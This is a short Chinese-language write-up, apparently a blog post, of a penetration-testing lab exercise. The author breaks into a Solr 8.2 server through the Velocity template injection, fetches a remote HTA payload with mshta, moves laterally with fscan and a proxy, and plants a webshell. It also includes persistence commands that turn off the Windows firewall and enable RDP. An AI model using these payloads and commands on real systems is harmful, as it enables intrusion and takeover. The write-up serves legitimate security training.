外网靶场1
信息收集
做了一个简单的信息收集
8.2 的版本,并且可以创建core ,不能修改debug 模式
web 渗透
默默打开了佩奇文档

前面几个都失败了
直接利用这个
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15POST /solr/test/config HTTP/1.1
Host:
{
"update-queryresponsewriter": {
"startup": "lazy",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir": "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
}
}
使用paylod

命令执行成功
尝试反弹shell
1
2/solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x="")+%23set($rt=$x.class.forName("java.lang.Runtime"))+%23set($chr=$x.class.forName('java.lang.Character'))+%23set($str=$x.class.forName("java.lang.String"))+%23set($ex=$rt.getRuntime().exec("whoami"))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end
使用msf hta_server

1
mshta http://8.xxx.xxx.25:8080/zHiMoiaBTT.hta
内网信息收集
网段信息

fscan 扫描


内网横向移动
开启代理
开启主机

开启客户端



代理成功
172.16.7.99
端口扫描
1
fscan64.exe -h 172.16.7.1/24发现存在nmap

浏览器开代理

进入内网
爆破web path

查看admin

爆破一下
发现爆破失败
发现路径www.zip
代码审计

查找密码

尝试爆破
失败,先放着,尝试使用其他方式

找到新的

爆破成功

登录成功
写webshell

连接antSword

查看网段

最后一个机子了
权限维持
关闭防火墙
1
set COMMAND netsh advfirewall set allprofiles state off
这个意思是没有设置嘛?
开启3389
1
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
外网靶场1
https://tsy244.github.io/2024/03/19/靶场记录/外网靶场1/